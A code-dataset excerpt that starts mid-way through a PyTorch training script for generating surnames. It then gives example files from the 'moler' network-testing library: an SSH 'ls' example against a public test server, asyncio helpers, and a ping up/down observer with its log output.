for sampled_index in range(sampled_indices.shape[0]):
surname = ""
for time_step in range(sampled_indices.shape[1]):
sample_item = sampled_indices[sampled_index, time_step].item()
if sample_item == vocab.begin_seq_index:
continue
elif sample_item == vocab.end_seq_index:
break
else:
surname += vocab.lookup_index(sample_item)
decoded_surnames.append(surname)
return decoded_surnames
# Prep work
if args.expand_filepaths_to_save_dir:
if args.conditional:
args.save_dir += "conditional"
else:
args.save_dir += "unconditional"
args.vectorizer_file = os.path.join(args.save_dir, args.vectorizer_file)
args.model_state_file = os.path.join(args.save_dir, args.model_state_file)
print("Expanded filepaths:")
print("\t{}".format(args.vectorizer_file))
print("\t{}".format(args.model_state_file))
# Check CUDA
if not torch.cuda.is_available():
args.cuda = False
args.device = torch.device("cuda" if args.cuda else "cpu")
print("Using CUDA: {}".format(args.cuda))
# Set seed for reproducibility
helper.set_seed_everywhere(args.seed, args.cuda)
# handle dirs
helper.handle_dirs(args.save_dir)
# Initializations
if args.reload_from_files:
# training from a checkpoint
print("Loading dataset and vectorizer")
dataset = SurnameDataset.load_dataset_and_load_vectorizer(
args.surname_csv, args.vectorizer_file)
else:
print("Loading dataset and creating vectorizer")
# create dataset and vectorizer
dataset = SurnameDataset.load_dataset_and_make_vectorizer(args.surname_csv)
dataset.save_vectorizer(args.vectorizer_file)
vectorizer = dataset.get_vectorizer()
mask_index = vectorizer.character_vocab.mask_index
if args.conditional:
model = ConditionalGenerationModel(char_embedding_size=args.char_embedding_size,
char_vocab_size=len(vectorizer.character_vocab),
num_nationalities=len(vectorizer.nationality_vocab),
rnn_hidden_size=args.rnn_hidden_size,
padding_idx=mask_index)
else:
model = UnconditionalGenerationModel(char_embedding_size=args.char_embedding_size,
char_vocab_size=len(vectorizer.character_vocab),
rnn_hidden_size=args.rnn_hidden_size,
padding_idx=mask_index)
model = model.to(args.device)
optimizer = optim.Adam(model.parameters(), lr=args.learning_rate)
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer=optimizer,
mode="min",
factor=0.5,
patience=1)
train_state = helper.make_train_state(args)
epoch_bar = tqdm_notebook(desc="training routine",
total=args.num_epochs,
position=0)
dataset.set_split("train")
train_bar = tqdm_notebook(desc="split=train",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
dataset.set_split("val")
val_bar = tqdm_notebook(desc="split=val",
total=dataset.get_num_batches(args.batch_size),
position=1,
leave=True)
try:
for epoch_index in range(args.num_epochs):
train_state["epoch_index"] = epoch_index
dataset.set_split("train")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.0
running_acc = 0.0
model.train()
for batch_index, batch_dict in enumerate(batch_generator):
optimizer.zero_grad()
if args.conditional:
y_pred = model(x_in=batch_dict["x_data"],
nationality_index=batch_dict["class_index"])
else:
y_pred = model(x_in=batch_dict["x_data"])
loss = helper.sequence_loss(y_pred, batch_dict["y_target"], mask_index)
loss.backward()
optimizer.step()
running_loss += (loss.item() - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"], mask_index)
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
train_bar.update()
train_state["train_loss"].append(running_loss)
train_state["train_acc"].append(running_acc)
dataset.set_split("val")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.0
running_acc = 0.0
model.eval()
for batch_index, batch_dict in enumerate(batch_generator):
if args.conditional:
y_pred = model(x_in=batch_dict["x_data"],
nationality_index=batch_dict["class_index"])
else:
y_pred = model(x_in=batch_dict["x_data"])
loss = helper.sequence_loss(y_pred, batch_dict["y_target"], mask_index)
running_loss += (loss.item() - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"], mask_index)
running_acc += (acc_t - running_acc) / (batch_index + 1)
val_bar.set_postfix(loss=running_loss,
acc=running_acc,
epoch=epoch_index)
val_bar.update()
train_state["val_loss"].append(running_loss)
train_state["val_acc"].append(running_acc)
train_state = helper.update_train_state(args=args,
model=model,
train_state=train_state)
scheduler.step(train_state["val_loss"][-1])
if train_state["stop_early"]:
break
model = model.cpu()
if args.conditional:
nationalities = np.random.choice(
np.arange(len(vectorizer.nationality_vocab)), replace=True, size=2)
sampled_surnames = decode_samples(
sample_from_conditional_model(model, vectorizer, nationalities),
vectorizer)
sample1 = "{}->{}".format(vectorizer.nationality_vocab.lookup_index(nationalities[0]),
sampled_surnames[0])
sample2 = "{}->{}".format(vectorizer.nationality_vocab.lookup_index(nationalities[1]),
sampled_surnames[1])
else:
sampled_surnames = decode_samples(
sample_from_unconditional_model(model, vectorizer, num_samples=20),
vectorizer)
sample1 = sampled_surnames[0]
sample2 = sampled_surnames[1]
epoch_bar.set_postfix(sample1=sample1, sample2=sample2)
model = model.to(args.device)
print(f"Epoch {epoch_index + 1}:")
print(f"\ttrain_acc = {train_state['train_acc'][-1]}"
f"\tval_acc = {train_state['val_acc'][-1]}")
print(f"\tsample1: {sample1}\tsample2: {sample2}")
train_bar.n = 0
val_bar.n = 0
epoch_bar.update()
except KeyboardInterrupt:
print("Exiting loop")
model.load_state_dict(torch.load(train_state["model_filename"]))
model = model.to(args.device)
dataset.set_split("test")
batch_generator = helper.generate_batches(dataset,
batch_size=args.batch_size,
device=args.device)
running_loss = 0.0
running_acc = 0.0
model.eval()
for batch_index, batch_dict in enumerate(batch_generator):
if args.conditional:
y_pred = model(x_in=batch_dict["x_data"],
nationality_index=batch_dict["class_index"])
else:
y_pred = model(x_in=batch_dict["x_data"])
loss = helper.sequence_loss(y_pred, batch_dict["y_target"], mask_index)
running_loss += (loss.item() - running_loss) / (batch_index + 1)
acc_t = helper.compute_accuracy(y_pred, batch_dict["y_target"], mask_index)
running_acc += (acc_t - running_acc) / (batch_index + 1)
train_state["test_loss"] = running_loss
train_state["test_acc"] = running_acc
print(f"Test loss: {train_state['test_loss']}")
print(f"Test acc: {train_state['test_acc']}")
# Inference
model = model.cpu()
if args.conditional:
for index in range(len(vectorizer.nationality_vocab)):
nationality = vectorizer.nationality_vocab.lookup_index(index)
print("Sampled for {}:".format(nationality))
sampled_indices = sample_from_conditional_model(model,
vectorizer,
nationalities=[index]*3,
temperature=0.7)
for sampled_surname in decode_samples(sampled_indices, vectorizer):
print("\t"+sampled_surname)
else:
sampled_surnames = decode_samples(
sample_from_unconditional_model(model, vectorizer, num_samples=20),
vectorizer)
print("-" * 10)
for sampled_surname in sampled_surnames:
print(sampled_surname)
``` |
{
"source": "jochenparm/moler",
"score": 2
} |
#### File: examples/command/unix_ls_on_device_async.py
```python
import asyncio
import logging
import sys
import moler.config.runners
from moler.config import load_config
from moler.device.device import DeviceFactory
def configure_logging():
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-45s | %(threadName)22s |%(message)s',
# format=' |%(name)-45s | %(threadName)12s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
def _cleanup_remaining_tasks(loop, logger):
# https://stackoverflow.com/questions/30765606/whats-the-correct-way-to-clean-up-after-an-interrupted-event-loop
# https://medium.com/python-pandemonium/asyncio-coroutine-patterns-beyond-await-a6121486656f
# Handle shutdown gracefully by waiting for all tasks to be cancelled
not_done_tasks = [task for task in asyncio.Task.all_tasks(loop=loop) if not task.done()]
if not_done_tasks:
logger.info("cancelling all remaining tasks")
# NOTE: following code cancels all tasks - possibly not ours as well
remaining_tasks = asyncio.gather(*not_done_tasks, loop=loop, return_exceptions=True)
remaining_tasks.add_done_callback(lambda t: loop.stop())
logger.debug("remaining tasks = {}".format(not_done_tasks))
remaining_tasks.cancel()
# Keep the event loop running until it is either destroyed or all
# tasks have really terminated
loop.run_until_complete(remaining_tasks)
def run_via_asyncio(async_to_run, debug_event_loop=False):
logger = logging.getLogger('asyncio.main')
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = asyncio.get_event_loop()
event_loop.set_debug(enabled=debug_event_loop)
try:
logger.info("starting events loop ...")
event_loop.run_until_complete(async_to_run)
_cleanup_remaining_tasks(loop=event_loop, logger=logger)
finally:
logger.info("closing events loop ...")
event_loop.close()
logger.info("... events loop closed")
# configure library directly from dict
load_config(config={'DEVICES': {'DEFAULT_CONNECTION':
{'CONNECTION_DESC': {'io_type': 'terminal', 'variant': 'asyncio-in-thread'}},
'RebexTestMachine':
{'DEVICE_CLASS': 'moler.device.unixremote.UnixRemote',
'CONNECTION_HOPS': {'UNIX_LOCAL':
{'UNIX_REMOTE':
{'execute_command': 'ssh',
'command_params': {'expected_prompt': 'demo@',
'host': 'test.rebex.net',
'login': 'demo',
'password': 'password',
'set_timeout': None}}}}}}},
config_type='dict')
configure_logging()
moler.config.runners.set_default_variant(variant='asyncio-in-thread')
# TODO: problem for {'CONNECTION_DESC': {'io_type': 'terminal', 'variant': 'asyncio'}},
# TODO: get_device() uses io.open() and not await open()
# async def do_async_device_ls():
# remote_unix = await DeviceFactory.get_device_coro(name='RebexTestMachine')
# remote_unix = await AsyncDeviceFactory.get_device(name='RebexTestMachine')
# # TODO: + textualdevice should have separate __init__() and async def open()
# await remote_unix.goto_state_coro(state="UNIX_REMOTE")
# ls_cmd = remote_unix.get_cmd(cmd_name="ls", cmd_params={"options": "-l"})
# remote_files = await ls_cmd
#
# run_via_asyncio(do_async_device_ls())
remote_unix = DeviceFactory.get_device(name='RebexTestMachine') # it starts in local shell
remote_unix.goto_state(state="UNIX_REMOTE") # make it go to remote shell
ls_cmd = remote_unix.get_cmd(cmd_name="ls", cmd_params={"options": "-l"})
remote_files = ls_cmd()
if 'readme.txt' in remote_files['files']:
print("readme.txt file:")
readme_file_info = remote_files['files']['readme.txt']
for attr in readme_file_info:
print(" {:<18}: {}".format(attr, readme_file_info[attr]))
# result:
"""
readme.txt file:
permissions : -rw-------
hard_links_count : 1
owner : demo
group : users
size_raw : 403
size_bytes : 403
date : Apr 08 2014
name : readme.txt
"""
```
#### File: layer_3/asyncio/asyncio_common.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import sys
import asyncio
def configure_logging():
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s |%(name)-45s | %(threadName)12s |%(message)s',
# format=' |%(name)-45s | %(threadName)12s |%(message)s',
datefmt='%H:%M:%S',
stream=sys.stderr,
)
def _cleanup_remaining_tasks(loop, logger):
# https://stackoverflow.com/questions/30765606/whats-the-correct-way-to-clean-up-after-an-interrupted-event-loop
# https://medium.com/python-pandemonium/asyncio-coroutine-patterns-beyond-await-a6121486656f
# Handle shutdown gracefully by waiting for all tasks to be cancelled
not_done_tasks = [task for task in asyncio.Task.all_tasks(loop=loop) if not task.done()]
if not_done_tasks:
logger.info("cancelling all remaining tasks")
# NOTE: following code cancels all tasks - possibly not ours as well
remaining_tasks = asyncio.gather(*not_done_tasks, loop=loop, return_exceptions=True)
remaining_tasks.add_done_callback(lambda t: loop.stop())
logger.debug("remaining tasks = {}".format(not_done_tasks))
remaining_tasks.cancel()
# Keep the event loop running until it is either destroyed or all
# tasks have really terminated
loop.run_until_complete(remaining_tasks)
def run_via_asyncio(async_to_run, debug_event_loop=False):
logger = logging.getLogger('asyncio.main')
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = asyncio.get_event_loop()
event_loop.set_debug(enabled=debug_event_loop)
try:
logger.info("starting events loop ...")
event_loop.run_until_complete(async_to_run)
_cleanup_remaining_tasks(loop=event_loop, logger=logger)
finally:
logger.info("closing events loop ...")
event_loop.close()
logger.info("... events loop closed")
```
#### File: layer_3/asyncio/asyncio_in_thread_runner_with_raw_functions.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import logging
import sys
import os
import threading
import time
from moler.connection_factory import get_connection
from moler.exceptions import ConnectionObserverTimeout
from moler.runner_factory import get_runner
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "..")) # allow finding modules in examples/
from network_toggle_observers import NetworkDownDetector, NetworkUpDetector
# ===================== Moler's connection-observer usage ======================
def ping_observing_task(ext_io_connection, ping_ip):
"""
Here external-IO connection is abstract - we don't know its type.
What we know is just that it has .moler_connection attribute.
"""
logger = logging.getLogger('moler.user.app-code')
conn_addr = str(ext_io_connection)
# Layer 2 of Moler's usage (ext_io_connection + runner):
# 3. create observers on Moler's connection
net_down_detector = NetworkDownDetector(ping_ip,
connection=ext_io_connection.moler_connection,
runner=get_runner(variant="asyncio-in-thread"))
net_up_detector = NetworkUpDetector(ping_ip,
connection=ext_io_connection.moler_connection,
runner=get_runner(variant="asyncio-in-thread"))
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_down_detector)
logger.debug('observe ' + info)
# 4. start observer (nonblocking, using as future)
net_down_detector.start() # should be started before we open connection
# to not loose first data on connection
with ext_io_connection:
# 5. await that observer to complete
try:
net_down_time = net_down_detector.await_done(timeout=10) # =2 --> TimeoutError
timestamp = time.strftime("%H:%M:%S", time.localtime(net_down_time))
logger.debug('Network {} is down from {}'.format(ping_ip, timestamp))
except ConnectionObserverTimeout:
logger.debug('Network down detector timed out')
# 6. call next observer (blocking till completes)
info = '{} on {} using {}'.format(ping_ip, conn_addr, net_up_detector)
logger.debug('observe ' + info)
# using as synchronous function (so we want verb to express action)
detect_network_up = net_up_detector
net_up_time = detect_network_up() # if you want timeout - see code above
timestamp = time.strftime("%H:%M:%S", time.localtime(net_up_time))
logger.debug('Network {} is back "up" from {}'.format(ping_ip, timestamp))
logger.debug('exiting ping_observing_task({})'.format(ping_ip))
# ==============================================================================
def main(connections2observe4ip):
logger = logging.getLogger('asyncio.main')
logger.debug('starting jobs observing connections')
# Starting the clients
jobs_on_connections = []
for connection_name, ping_ip in connections2observe4ip:
# ------------------------------------------------------------------
# This front-end code hides all details of connection.
# We just use its name - such name should be meaningful for user.
# like: "main_dns_server", "backup_ntp_server", ...
# Another words, all we want here is stg like:
# "give me connection to main_dns_server"
# ------------------------------------------------------------------
# con_logger = logging.getLogger('tcp-async_in_thrd-io.{}'.format(connection_name))
# tcp_connection = get_connection(name=connection_name, variant='asyncio-in-thread', logger=con_logger)
tcp_connection = get_connection(name=connection_name, variant='asyncio-in-thread')
client_thread = threading.Thread(target=ping_observing_task,
args=(tcp_connection, ping_ip))
client_thread.start()
jobs_on_connections.append(client_thread)
# await observers job to be done
for client_thread in jobs_on_connections:
client_thread.join()
logger.debug('all jobs observing connections are done')
# ==============================================================================
if __name__ == '__main__':
from threaded_ping_server import start_ping_servers, stop_ping_servers
from asyncio_common import configure_logging
import os
from moler.config import load_config
# -------------------------------------------------------------------
# Configure moler connections (backend code)
# 1) configure variant by YAML config file
# 2) ver.2 - configure named connections by YAML config file
load_config(config=os.path.join(os.path.dirname(__file__), "..", "named_connections.yml"))
# 3) take default class used to realize tcp-threaded-connection
# -------------------------------------------------------------------
configure_logging()
net_1 = ('localhost', 5671)
net_2 = ('localhost', 5672)
connections2serve = [(net_1, '10.0.2.15'),
(net_2, '10.0.2.16')]
connections2observe4ip = [('net_1', '10.0.2.15'),
('net_2', '10.0.2.16')]
servers = start_ping_servers(connections2serve)
try:
main(connections2observe4ip)
finally:
stop_ping_servers(servers)
'''
LOG OUTPUT
15:28:23 |threaded.ping.tcp-server(5671) | MainThread |Ping Sim started at tcp://localhost:5671
15:28:23 |threaded.ping.tcp-server(5672) | MainThread |Ping Sim started at tcp://localhost:5672
15:28:23 |asyncio.main | MainThread |starting jobs observing connections
15:28:23 |moler.runner.asyncio-in-thrd:0 | Thread-3 |created AsyncioInThreadRunner:139990601181112
15:28:23 |moler.user.app-code | Thread-3 |observe 10.0.2.15 on tcp://localhost:5671 using NetworkDownDetector(id:7f521a0e27f0)
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |go background: NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:23 |asyncio | Thread-3 |Using selector: EpollSelector
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |created loop 4 thread: 139990601182008:<_UnixSelectorEventLoop running=False closed=False debug=False>
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |created thread <TillDoneThread(Thread-5, initial)> with loop 139990601182008:<_UnixSelectorEventLoop running=False closed=False debug=True>
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-5 |starting new asyncio-in-thrd loop ...
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0e27f0 | Thread-3 |started new asyncio-in-thrd loop ...
15:28:23 |moler.user.app-code | Thread-4 |observe 10.0.2.16 on tcp://localhost:5672 using NetworkDownDetector(id:7f521a0d6710)
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-4 |go background: NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |will await stop_event ...
15:28:23 |moler.NetworkDownDetector(id:7f521a0d6710) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |START OF feed(NetworkDownDetector(id:7f521a0d6710))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |start feeding(NetworkDownDetector(id:7f521a0d6710))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed subscribing for data NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feeding(NetworkDownDetector(id:7f521a0d6710)) started
15:28:23 |moler.NetworkDownDetector(id:7f521a0e27f0) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' started.
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |START OF feed(NetworkDownDetector(id:7f521a0e27f0))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |start feeding(NetworkDownDetector(id:7f521a0e27f0))
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed subscribing for data NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feeding(NetworkDownDetector(id:7f521a0e27f0)) started
15:28:23 |threaded.ping.tcp-server(5672 -> 43373) | Thread-6 |connection accepted - client at tcp://127.0.0.1:43373
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-4 |go foreground: NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>]) - await max. 10 [sec]
15:28:23 |moler.net_2 | Thread-7 |
15:28:23 |threaded.ping.tcp-server(5671 -> 49571) | Thread-8 |connection accepted - client at tcp://127.0.0.1:49571
15:28:23 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-3 |go foreground: NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>]) - await max. 10 [sec]
15:28:23 |moler.net_1 | Thread-9 |
15:28:24 |moler.net_2 | Thread-7 |greg@debian:~$ ping 10.0.2.16
15:28:24 |moler.net_1 | Thread-9 |greg@debian:~$ ping 10.0.2.15
15:28:25 |moler.net_2 | Thread-7 |PING 10.0.2.16 (10.0.2.16) 56(84) bytes of data.
15:28:25 |moler.net_1 | Thread-9 |PING 10.0.2.15 (10.0.2.15) 56(84) bytes of data.
15:28:26 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=1 ttl=64 time=0.080 ms
15:28:26 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=1 ttl=64 time=0.080 ms
15:28:27 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=2 ttl=64 time=0.037 ms
15:28:27 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=2 ttl=64 time=0.037 ms
15:28:28 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=3 ttl=64 time=0.045 ms
15:28:28 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
15:28:29 |moler.net_2 | Thread-7 |ping: sendmsg: Network is unreachable
15:28:29 |moler.NetworkDownDetector(id:7f521a0d6710) | Thread-7 |Network 10.0.2.16 is down!
15:28:29 |moler.net_1 | Thread-9 |ping: sendmsg: Network is unreachable
15:28:29 |moler.NetworkDownDetector(id:7f521a0e27f0) | Thread-9 |Network 10.0.2.15 is down!
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed done & unsubscribing NetworkDownDetector(id:7f521a0d6710, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |END OF feed(NetworkDownDetector(id:7f521a0d6710))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed returning result: 1541514509.3102295
15:28:29 |moler.NetworkDownDetector(id:7f521a0d6710) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed done & unsubscribing NetworkDownDetector(id:7f521a0e27f0, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |END OF feed(NetworkDownDetector(id:7f521a0e27f0))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-5 |feed returning result: 1541514509.311799
15:28:29 |moler.NetworkDownDetector(id:7f521a0e27f0) | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkDownDetector' finished.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6710 | Thread-3 |NetworkDownDetector(id:7f521a0e27f0) returned 1541514509.311799
15:28:29 |moler.user.app-code | Thread-3 |Network 10.0.2.15 is down from 15:28:29
15:28:29 |moler.user.app-code | Thread-3 |observe 10.0.2.15 on tcp://localhost:5671 using NetworkUpDetector(id:7f521a0e2ba8)
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0e2ba8 | Thread-3 |go background: NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0e2ba8 | Thread-4 |NetworkDownDetector(id:7f521a0d6710) returned 1541514509.3102295
15:28:29 |moler.user.app-code | Thread-4 |Network 10.0.2.16 is down from 15:28:29
15:28:29 |moler.user.app-code | Thread-4 |observe 10.0.2.16 on tcp://localhost:5672 using NetworkUpDetector(id:7f521a0d6860)
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-4 |go background: NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:29 |asyncio | Thread-5 |poll took 1.560 ms: 1 events
15:28:29 |moler.NetworkUpDetector(id:7f521a0e2ba8) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |START OF feed(NetworkUpDetector(id:7f521a0e2ba8))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |start feeding(NetworkUpDetector(id:7f521a0e2ba8))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed subscribing for data NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feeding(NetworkUpDetector(id:7f521a0e2ba8)) started
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-3 |go foreground: NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>]) - await max. None [sec]
15:28:29 |moler.NetworkUpDetector(id:7f521a0d6860) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' started.
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |START OF feed(NetworkUpDetector(id:7f521a0d6860))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |start feeding(NetworkUpDetector(id:7f521a0d6860))
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed subscribing for data NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feeding(NetworkUpDetector(id:7f521a0d6860)) started
15:28:29 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-4 |go foreground: NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>]) - await max. None [sec]
15:28:30 |moler.net_2 | Thread-7 |ping: sendmsg: Network is unreachable
15:28:30 |moler.net_1 | Thread-9 |ping: sendmsg: Network is unreachable
15:28:31 |moler.net_2 | Thread-7 |ping: sendmsg: Network is unreachable
15:28:31 |moler.net_1 | Thread-9 |ping: sendmsg: Network is unreachable
15:28:32 |moler.net_1 | Thread-9 |64 bytes from 10.0.2.15: icmp_req=7 ttl=64 time=0.123 ms
15:28:32 |moler.NetworkUpDetector(id:7f521a0e2ba8) | Thread-9 |Network 10.0.2.15 is up!
15:28:32 |moler.net_2 | Thread-7 |64 bytes from 10.0.2.16: icmp_req=7 ttl=64 time=0.123 ms
15:28:32 |moler.NetworkUpDetector(id:7f521a0d6860) | Thread-7 |Network 10.0.2.16 is up!
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed done & unsubscribing NetworkUpDetector(id:7f521a0e2ba8, using ThreadedMolerConnection(id:7f521a0e2470)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2630>>])
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |END OF feed(NetworkUpDetector(id:7f521a0e2ba8))
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed returning result: 1541514512.3170855
15:28:32 |moler.NetworkUpDetector(id:7f521a0e2ba8) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.net_1 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed done & unsubscribing NetworkUpDetector(id:7f521a0d6860, using ThreadedMolerConnection(id:7f521a0e2780)-->[<bound method Tcp.send of <moler.io.raw.tcp.ThreadedTcp object at 0x7f521a0e2978>>])
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |END OF feed(NetworkUpDetector(id:7f521a0d6860))
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-5 |feed returning result: 1541514512.3174996
15:28:32 |moler.NetworkUpDetector(id:7f521a0d6860) | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.net_2 | Thread-5 |Observer 'network_toggle_observers.NetworkUpDetector' finished.
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-3 |NetworkUpDetector(id:7f521a0e2ba8) returned 1541514512.3170855
15:28:32 |moler.user.app-code | Thread-3 |Network 10.0.2.15 is back "up" from 15:28:32
15:28:32 |moler.runner.asyncio-in-thrd:7f521a0d6860 | Thread-4 |NetworkUpDetector(id:7f521a0d6860) returned 1541514512.3174996
